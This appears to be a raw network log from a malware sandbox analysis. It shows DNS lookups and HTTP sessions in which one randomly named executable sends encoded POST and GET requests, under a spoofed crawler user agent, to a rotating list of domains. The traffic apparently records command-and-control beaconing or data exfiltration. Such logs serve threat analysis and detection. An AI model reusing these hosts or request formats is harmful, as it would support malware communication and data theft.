                                                          Jul 13, 2024 00:05:05.788537025 CEST | 192.168.2.6 | 1.1.1.1 | 0xbfc6 | Standard query (0) | www.quixaclienti.com | A (IP address) | IN (0x0001) | false
                                                          Jul 13, 2024 00:05:19.868275881 CEST | 192.168.2.6 | 1.1.1.1 | 0x5402 | Standard query (0) | www.789bet1okvip.solutions | A (IP address) | IN (0x0001) | false
                                                          Jul 13, 2024 00:05:33.728169918 CEST | 192.168.2.6 | 1.1.1.1 | 0xcaef | Standard query (0) | www.334es.com | A (IP address) | IN (0x0001) | false
                                                          Jul 13, 2024 00:05:47.256772041 CEST | 192.168.2.6 | 1.1.1.1 | 0x2564 | Standard query (0) | www.411divorce.com | A (IP address) | IN (0x0001) | false
                                                          Jul 13, 2024 00:06:00.757019043 CEST | 192.168.2.6 | 1.1.1.1 | 0x2895 | Standard query (0) | www.sgbet777.org | A (IP address) | IN (0x0001) | false
                                                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                          Jul 13, 2024 00:02:48.716965914 CEST | 1.1.1.1 | 192.168.2.6 | 0x523b | No error (0) | www.yexz60.live | yexz60.live | - | CNAME (Canonical name) | IN (0x0001) | false
                                                          Jul 13, 2024 00:02:48.716965914 CEST | 1.1.1.1 | 192.168.2.6 | 0x523b | No error (0) | yexz60.live | - | 3.33.130.190 | A (IP address) | IN (0x0001) | false
                                                          Jul 13, 2024 00:02:48.716965914 CEST | 1.1.1.1 | 192.168.2.6 | 0x523b | No error (0) | yexz60.live | - | 15.197.148.33 | A (IP address) | IN (0x0001) | false
                                                          Jul 13, 2024 00:03:05.778172016 CEST | 1.1.1.1 | 192.168.2.6 | 0x6c77 | No error (0) | www.sodnavisystem.com | - | 162.43.105.95 | A (IP address) | IN (0x0001) | false
                                                          Jul 13, 2024 00:03:05.778317928 CEST | 1.1.1.1 | 192.168.2.6 | 0x6c77 | No error (0) | www.sodnavisystem.com | - | 162.43.105.95 | A (IP address) | IN (0x0001) | false
                                                          Jul 13, 2024 00:03:19.283248901 CEST | 1.1.1.1 | 192.168.2.6 | 0x94d7 | No error (0) | www.gymroom.online | - | 37.9.175.173 | A (IP address) | IN (0x0001) | false
                                                          Jul 13, 2024 00:03:32.917728901 CEST | 1.1.1.1 | 192.168.2.6 | 0x61e4 | No error (0) | www.hectmalt.xyz | - | 203.161.41.207 | A (IP address) | IN (0x0001) | false
                                                          Jul 13, 2024 00:03:46.177983046 CEST | 1.1.1.1 | 192.168.2.6 | 0x3ddd | No error (0) | www.atlpicsstudios.com | atlpicsstudios.com | - | CNAME (Canonical name) | IN (0x0001) | false
                                                          Jul 13, 2024 00:03:46.177983046 CEST | 1.1.1.1 | 192.168.2.6 | 0x3ddd | No error (0) | atlpicsstudios.com | - | 3.33.130.190 | A (IP address) | IN (0x0001) | false
                                                          Jul 13, 2024 00:03:46.177983046 CEST | 1.1.1.1 | 192.168.2.6 | 0x3ddd | No error (0) | atlpicsstudios.com | - | 15.197.148.33 | A (IP address) | IN (0x0001) | false
                                                          Jul 13, 2024 00:03:59.287723064 CEST | 1.1.1.1 | 192.168.2.6 | 0x4e37 | No error (0) | www.bearclaw.bot | bearclaw.bot | - | CNAME (Canonical name) | IN (0x0001) | false
                                                          Jul 13, 2024 00:03:59.287723064 CEST | 1.1.1.1 | 192.168.2.6 | 0x4e37 | No error (0) | bearclaw.bot | - | 3.33.130.190 | A (IP address) | IN (0x0001) | false
                                                          Jul 13, 2024 00:03:59.287723064 CEST | 1.1.1.1 | 192.168.2.6 | 0x4e37 | No error (0) | bearclaw.bot | - | 15.197.148.33 | A (IP address) | IN (0x0001) | false
                                                          Jul 13, 2024 00:04:12.436220884 CEST | 1.1.1.1 | 192.168.2.6 | 0xedea | No error (0) | www.noghteyab.com | - | 51.89.93.192 | A (IP address) | IN (0x0001) | false
                                                          Jul 13, 2024 00:04:25.712505102 CEST | 1.1.1.1 | 192.168.2.6 | 0x2d41 | No error (0) | www.mcpcrecycling.com | mcpcrecycling.com | - | CNAME (Canonical name) | IN (0x0001) | false
                                                          Jul 13, 2024 00:04:25.712505102 CEST | 1.1.1.1 | 192.168.2.6 | 0x2d41 | No error (0) | mcpcrecycling.com | - | 3.33.130.190 | A (IP address) | IN (0x0001) | false
                                                          Jul 13, 2024 00:04:25.712505102 CEST | 1.1.1.1 | 192.168.2.6 | 0x2d41 | No error (0) | mcpcrecycling.com | - | 15.197.148.33 | A (IP address) | IN (0x0001) | false
                                                          Jul 13, 2024 00:04:38.856600046 CEST | 1.1.1.1 | 192.168.2.6 | 0xc6a5 | No error (0) | www.evoolihubs.shop | - | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                                                          Jul 13, 2024 00:04:38.856600046 CEST | 1.1.1.1 | 192.168.2.6 | 0xc6a5 | No error (0) | www.evoolihubs.shop | - | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                                          Jul 13, 2024 00:04:52.304666042 CEST | 1.1.1.1 | 192.168.2.6 | 0x986e | No error (0) | www.shaf-kupe-msk.store | - | 45.130.41.38 | A (IP address) | IN (0x0001) | false
                                                          Jul 13, 2024 00:05:06.007956982 CEST | 1.1.1.1 | 192.168.2.6 | 0xbfc6 | No error (0) | www.quixaclienti.com | quixaclienti.com | - | CNAME (Canonical name) | IN (0x0001) | false
                                                          Jul 13, 2024 00:05:06.007956982 CEST | 1.1.1.1 | 192.168.2.6 | 0xbfc6 | No error (0) | quixaclienti.com | - | 3.33.130.190 | A (IP address) | IN (0x0001) | false
                                                          Jul 13, 2024 00:05:06.007956982 CEST | 1.1.1.1 | 192.168.2.6 | 0xbfc6 | No error (0) | quixaclienti.com | - | 15.197.148.33 | A (IP address) | IN (0x0001) | false
                                                          Jul 13, 2024 00:05:20.554398060 CEST | 1.1.1.1 | 192.168.2.6 | 0x5402 | No error (0) | www.789bet1okvip.solutions | 789bet1okvip.solutions | - | CNAME (Canonical name) | IN (0x0001) | false
                                                          Jul 13, 2024 00:05:20.554398060 CEST | 1.1.1.1 | 192.168.2.6 | 0x5402 | No error (0) | 789bet1okvip.solutions | - | 3.33.130.190 | A (IP address) | IN (0x0001) | false
                                                          Jul 13, 2024 00:05:20.554398060 CEST | 1.1.1.1 | 192.168.2.6 | 0x5402 | No error (0) | 789bet1okvip.solutions | - | 15.197.148.33 | A (IP address) | IN (0x0001) | false
                                                          Jul 13, 2024 00:05:33.764424086 CEST | 1.1.1.1 | 192.168.2.6 | 0xcaef | No error (0) | www.334es.com | - | 103.176.91.154 | A (IP address) | IN (0x0001) | false
                                                          Jul 13, 2024 00:05:47.275691986 CEST | 1.1.1.1 | 192.168.2.6 | 0x2564 | No error (0) | www.411divorce.com | 411divorce.com | - | CNAME (Canonical name) | IN (0x0001) | false
                                                          Jul 13, 2024 00:05:47.275691986 CEST | 1.1.1.1 | 192.168.2.6 | 0x2564 | No error (0) | 411divorce.com | - | 5.78.41.174 | A (IP address) | IN (0x0001) | false
                                                          Jul 13, 2024 00:06:01.351702929 CEST | 1.1.1.1 | 192.168.2.6 | 0x2895 | No error (0) | www.sgbet777.org | sgbet777.org | - | CNAME (Canonical name) | IN (0x0001) | false
                                                          Jul 13, 2024 00:06:01.351702929 CEST | 1.1.1.1 | 192.168.2.6 | 0x2895 | No error (0) | sgbet777.org | - | 64.46.102.70 | A (IP address) | IN (0x0001) | false
                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          0 | 192.168.2.6 | 49718 | 3.33.130.190 | 80 | 5396 | C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 13, 2024 00:02:48.729630947 CEST | 465 | OUT | GET /b58q/?D0Pts04=9y3r5r666D9AuSqeHTwPloJpY6P8Smz3EkVcUHvxQ2YtNmYEvcMAxsdD5dSUMIh6vRZbYKiLrFXGiCp3Pe2iajC50awG1CYTeWFE8FX2P+KAxyDMNwoJDu19IBdamGeoAx/bn7Y=&Q8s=tdcd5h7ptjmdxx HTTP/1.1
                                                          Host: www.yexz60.live
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Jul 13, 2024 00:02:49.193123102 CEST | 418 | IN | HTTP/1.1 200 OK
                                                          Server: openresty
                                                          Date: Fri, 12 Jul 2024 22:02:49 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 278
                                                          Connection: close
                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?D0Pts04=9y3r5r666D9AuSqeHTwPloJpY6P8Smz3EkVcUHvxQ2YtNmYEvcMAxsdD5dSUMIh6vRZbYKiLrFXGiCp3Pe2iajC50awG1CYTeWFE8FX2P+KAxyDMNwoJDu19IBdamGeoAx/bn7Y=&Q8s=tdcd5h7ptjmdxx"}</script></head></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          1 | 192.168.2.6 | 49720 | 162.43.105.95 | 80 | 5396 | C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 13, 2024 00:03:05.787103891 CEST | 734 | OUT | POST /5mht/ HTTP/1.1
                                                          Host: www.sodnavisystem.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.sodnavisystem.com
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 212
                                                          Referer: http://www.sodnavisystem.com/5mht/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Ascii: D0Pts04=U2Ur9XKzU6CWFxBAWeTfdfDy+xHwIHOE66be6+QcvsSUuUho2VFdZbvzCfN/SNGaZF1NSIEdQMBA54MHp0c8VhpHIbxHpGC46Wfx7W4+b3RyD3t9hFuDLdgSTWCqQVAH/dlLkykIKk4aX1et7yPImpBPMAgswmDnrz+DqNqoC0j0wPmz+/+MDKi1uTa3XD5o+fOGhCnxdaN/
                                                          Jul 13, 2024 00:03:06.594902992 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Fri, 12 Jul 2024 22:03:06 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Last-Modified: Mon, 13 May 2024 05:45:59 GMT
                                                          ETag: W/"afe-6184f66651a97"
                                                          Content-Encoding: gzip
                                                          Data: [gzip-compressed binary body, not shown]
                                                          Jul 13, 2024 00:03:06.594926119 CEST | 353 | IN | [gzip-compressed binary body continuation, not shown]


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          2 | 192.168.2.6 | 49722 | 162.43.105.95 | 80 | 5396 | C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 13, 2024 00:03:08.328007936 CEST | 758 | OUT | POST /5mht/ HTTP/1.1
                                                          Host: www.sodnavisystem.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.sodnavisystem.com
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 236
                                                          Referer: http://www.sodnavisystem.com/5mht/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Ascii: D0Pts04=U2Ur9XKzU6CWHRRAafTfWfDzyRHwTXOI66He66oMve2UuwlokhpdabvzN/N+ftGrZFJFSMEdQMFA56UHoFc7XxpFdLxFmmC46Wfx7WsEb3ZyCHd9jkuAUtgdEmCqGVAD/dk7k3MiKnQaXw6t4jPJtpAGIAht9nDvtRzO0eq8TEvE15npiM+vRaC3uRCFXj5C8f2GzVrWSuocC0usCqRH8DUrXavoG4wHMQ==
                                                          Jul 13, 2024 00:03:09.169740915 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Fri, 12 Jul 2024 22:03:09 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Last-Modified: Mon, 13 May 2024 05:45:59 GMT
                                                          ETag: W/"afe-6184f66651a97"
                                                          Content-Encoding: gzip
                                                          Data: [gzip-compressed binary body, not shown]
                                                          Jul 13, 2024 00:03:09.169766903 CEST | 353 | IN | [gzip-compressed binary body continuation, not shown]


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          3 | 192.168.2.6 | 49723 | 162.43.105.95 | 80 | 5396 | C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 13, 2024 00:03:10.859141111 CEST | 1771 | OUT | POST /5mht/ HTTP/1.1
                                                          Host: www.sodnavisystem.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.sodnavisystem.com
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1248
                                                          Referer: http://www.sodnavisystem.com/5mht/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Ascii: D0Pts04=U2Ur9XKzU6CWHRRAafTfWfDzyRHwTXOI66He66oMve+UuD9o1wpdbbvzEfN7ftGMZFR/SMInQJZA5fIHv3k7dxpFfLxYpGCp6WO47W8Eb3ZyCBx9wVuAWtgSTWCcQVA7/d8Nk3IYKXwaWQqt0xnJgpAENAg+9iaxtRv40d2aTDnE1IX20NilLceb+Dq1YTpl7e2LgGfUT9w8KjPwMaQ/sRsJdvf3PowOPNNBfSkhSY2PZDzdtS+7dKfpnGo9n2Xx1ML9bEHJwFq+CQk+Okaw5CtH0f1rHa7ud3K0w/aUt39vPDwYeBnfZ4GvBHqs3grAaIqDRVW+l+yT+mu9JaeAZJ5TXmoErrnCAc3oxPAP6HXaXWlT3JAWsF/R2KNUGOsR4g0hpZVJx/OWXDSCGWRKGfwtVwmwOTXi41mIM+8NtqpjVOsPVBlcI1sIknWasx+84gg9r+wLG+YZCg2YJCStGys9SvYz3ihEbeWVgD1gPujE7yXNzERg6zCXbAdCz/V+7Us26Eod0AUto6KC8Q0c8nAWGdxLXWh51qNTO9hvDC24FjkG/1c+KB5urcv/hiG1LW8WiiDqWHdIdCH47LEEDA+VKdvpNVk5FSt6LqI2jRkQBabG85Qz1b8LGiA3mK12i8z5ROCjY1/A0ZC9w0SlL3JIa83Bfz3vmNT4hTVxjkHgvIJTE+85FqBCyYX0W+QNovR+0X/J8k6Dvk9Oo2/DISCEtZzZLl1xFzDeNcHzkx8xBLqAb5jpJgBYAjkmQ+65fsibGcX0ll3Ws3wzt/YjrbMkMfrlU1P6ANJCWIYWHtEFLTgo7gJ+gOXoT6VMeIvGq3FZ7PKQ6h2b9Cfft+XZLzP+5ouwL0epDcLgMCy8GCuRo5KF8rtrxHZxmjbII79LHUFDMA3cuAVX5CgG8vMrH9ax7K0OrZScri2yZh6Js1m5KCORsuHBkZ0308b9mBG/SEM3fgfbuNFaNy7h4ooN82KXcGhxlMXaYa5/Mr0pJyjG [TRUNCATED]
                                                          Jul 13, 2024 00:03:11.663120031 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Fri, 12 Jul 2024 22:03:11 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Last-Modified: Mon, 13 May 2024 05:45:59 GMT
                                                          ETag: W/"afe-6184f66651a97"
                                                          Content-Encoding: gzip
                                                          Jul 13, 2024 00:03:11.663170099 CEST | 353 | IN | Data Raw: [gzip-compressed chunk, not shown]


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          4 | 192.168.2.6 | 49724 | 162.43.105.95 | 80 | 5396 | C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 13, 2024 00:03:13.390597105 CEST | 471 | OUT | GET /5mht/?D0Pts04=Z08L+geXOaCZa14sbeCJfO+ty3TNCWizhbeG/u0IqvbIpSo6wwwncoz4Fc07Z+7/YVsNS4spfMpi37Q9hxoWZDkaSJlwmX6Cm2C8jVF4FHpqAh5dp062dcYDJG78WF4slIEKgCc=&Q8s=tdcd5h7ptjmdxx HTTP/1.1
                                                          Host: www.sodnavisystem.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Jul 13, 2024 00:03:14.196311951 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Fri, 12 Jul 2024 22:03:14 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 2814
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Last-Modified: Mon, 13 May 2024 05:45:59 GMT
                                                          ETag: "afe-6184f66651a97"
                                                          Data Ascii: <!DOCTYPE html><html lang="ja"><head><meta charset="EUC-JP" /><title>404 File Not Found</title><meta name="copyright" content="Copyright XSERVER Inc."><meta name="robots" content="INDEX,FOLLOW" /><meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0"><style type="text/css">* { margin: 0; padding: 0;}img { border: 0;}ul { padding-left: 2em;}html { overflow-y: scroll; background: #3b79b7;}body { font-family: "", Meiryo, " ", "MS PGothic", " Pro W3", "Hiragino Kaku Gothic Pro", sans-serif; margin: 0; line-height: 1.4; font-size: 75%; text-align: center; color: white;}h1 { font-size: 24px; font-weight: bold;}h1 { font-weight: bold; line-height: 1; padding-bottom: 20px; font-family: Helvetica, sans-serif;}h2 { text-align: center; font-weight: bold; font-size: 27px;}p { text-align: center; font-size: 14px;
                                                          Jul 13, 2024 00:03:14.196331978 CEST | 1236 | IN | Data Ascii: margin: 0; padding: 0; color: white;}.explain { border-top: 1px solid #fff; border-bottom: 1px solid #fff; line-height: 1.5; margin: 30px auto; padding: 17px;}#cause { text-align: left;}#cause li {
                                                          Jul 13, 2024 00:03:14.196342945 CEST | 582 | IN | Data Ascii: div id="base"> <h1><span>404</span><br /> File Not Found</h1> <h2></h2> <p class="explain"></p> <h3>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          5 | 192.168.2.6 | 49725 | 37.9.175.173 | 80 | 5396 | C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 13, 2024 00:03:19.293894053 CEST | 725 | OUT | POST /9v4b/ HTTP/1.1
                                                          Host: www.gymroom.online
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.gymroom.online
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 212
                                                          Referer: http://www.gymroom.online/9v4b/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Ascii: D0Pts04=dytbKSQdahL3Ifa11BVGK1+WhKOV0Ko5MjSnSxH6jl7PRlQH+BxlrVL77mz20kXPLX/vbRkLipEwoUDh/yhmhiTNEkIhZtcBGN/je6Al5UlZ3DH9eCA9wWx4ghaR9nualhJSaETPRubbA+NIRp1SlAwFQfhzyoTshw9P16hkWrC7LyoIpDm5zEf0glPT5Eo4ZWQEBV+Htq8y
                                                          Jul 13, 2024 00:03:20.056786060 CEST | 298 | IN | HTTP/1.1 404 Not Found
                                                          Server: openresty
                                                          Date: Fri, 12 Jul 2024 22:03:19 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Content-Encoding: br


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          6 | 192.168.2.6 | 49726 | 37.9.175.173 | 80 | 5396 | C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 13, 2024 00:03:21.932615995 CEST | 749 | OUT | POST /9v4b/ HTTP/1.1
                                                          Host: www.gymroom.online
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.gymroom.online
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 236
                                                          Referer: http://www.gymroom.online/9v4b/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Ascii: D0Pts04=dytbKSQdahL3J7e15CNGNV+V9aOVtaoDMjWnS1WijXvPRAUH/AxloVL78Wz36EXyLX6YbRYLipQwoVzh/BZlgyTPRUInWNcBGN/je+h45U9Z3TX9ZTAy2mx7pBaR5nuelhJwaG2aRsjbA/9IR41VsAxANPga6I28uzA77oJ3XJOHOEpS1wmahU/2gnXh5koSbWoETCygieZRjCiXLLOus2nSAZKZKmtL/Q==
                                                          Jul 13, 2024 00:03:22.665031910 CEST | 298 | IN | HTTP/1.1 404 Not Found
                                                          Server: openresty
                                                          Date: Fri, 12 Jul 2024 22:03:22 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Content-Encoding: br


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          7 | 192.168.2.6 | 49727 | 37.9.175.173 | 80 | 5396 | C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 13, 2024 00:03:24.473283052 CEST | 1762 | OUT | POST /9v4b/ HTTP/1.1
                                                          Host: www.gymroom.online
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.gymroom.online
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1248
                                                          Referer: http://www.gymroom.online/9v4b/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Jul 13, 2024 00:03:25.168262959 CEST | 298 | IN | HTTP/1.1 404 Not Found
                                                          Server: openresty
                                                          Date: Fri, 12 Jul 2024 22:03:25 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Content-Encoding: br


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          8 | 192.168.2.6 | 49728 | 37.9.175.173 | 80 | 5396 | C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 13, 2024 00:03:27.012871981 CEST | 468 | OUT | GET /9v4b/?D0Pts04=QwF7JlY1PSjHVra+4y9GAkGIkNjMkM0Pe3Kcc1HOimPCQG1R1SgxoF7twkiq9lSaXC7xRVtY7bcnqH/14lNeqyWzLUYbSscBa/GhZ/wr7EAZrjTVHikp9QpcnDnmqECCiEdhejU=&Q8s=tdcd5h7ptjmdxx HTTP/1.1
                                                          Host: www.gymroom.online
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Jul 13, 2024 00:03:27.696687937 CEST | 343 | IN | HTTP/1.1 404 Not Found
                                                          Server: openresty
                                                          Date: Fri, 12 Jul 2024 22:03:27 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Vary: Accept-Encoding
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          9 | 192.168.2.6 | 49729 | 203.161.41.207 | 80 | 5396 | C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 13, 2024 00:03:32.928778887 CEST | 719 | OUT | POST /9ntw/ HTTP/1.1
                                                          Host: www.hectmalt.xyz
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.hectmalt.xyz
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 212
                                                          Referer: http://www.hectmalt.xyz/9ntw/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Ascii: D0Pts04=OHQ87VvZwV7EDGoxjNNrjyL/U2KG4NWyvYFPqqdQpsJVlVfPq52jnBQJG/jVHi49IJ31DSx8/chCil9PsItWGupvE79nCvyQV/g11hKPFgQBy8mPk/xjKoJ4Wr32oH6KW0FASYOhtHtO2W8cLxNAm8qy8dd11O2RMZSauyRKpdEJDynv1t4LPBBNVJNt1SM3wSb1poW/KR/C
                                                          Jul 13, 2024 00:03:33.536286116 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                          Date: Fri, 12 Jul 2024 22:03:33 GMT
                                                          Server: Apache
                                                          Content-Length: 389
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          10 | 192.168.2.6 | 49732 | 203.161.41.207 | 80 | 5396 | C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 13, 2024 00:03:35.469006062 CEST | 743 | OUT | POST /9ntw/ HTTP/1.1
                                                          Host: www.hectmalt.xyz
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.hectmalt.xyz
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 236
                                                          Referer: http://www.hectmalt.xyz/9ntw/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Ascii: D0Pts04=OHQ87VvZwV7ECm4xlelrqyL4R2KGt9X1vYJPqrYNpYlVl1PPt7OjuRQJevjQDi4AIJzMDSN8/clCilNPt5tRA+ptfL9hd/yQV/g11hfaFgYBysWPkcpsUYJ7Bb327X6OW0EjSarMtFVO2UkcLkxH/Mqo4dc4+/PDJPXYwThQ5fg2CEm1pe4odRhPVLVf1yMdySj17/aYFlahsZjpsydZyQsN/43H+tDkcQ==
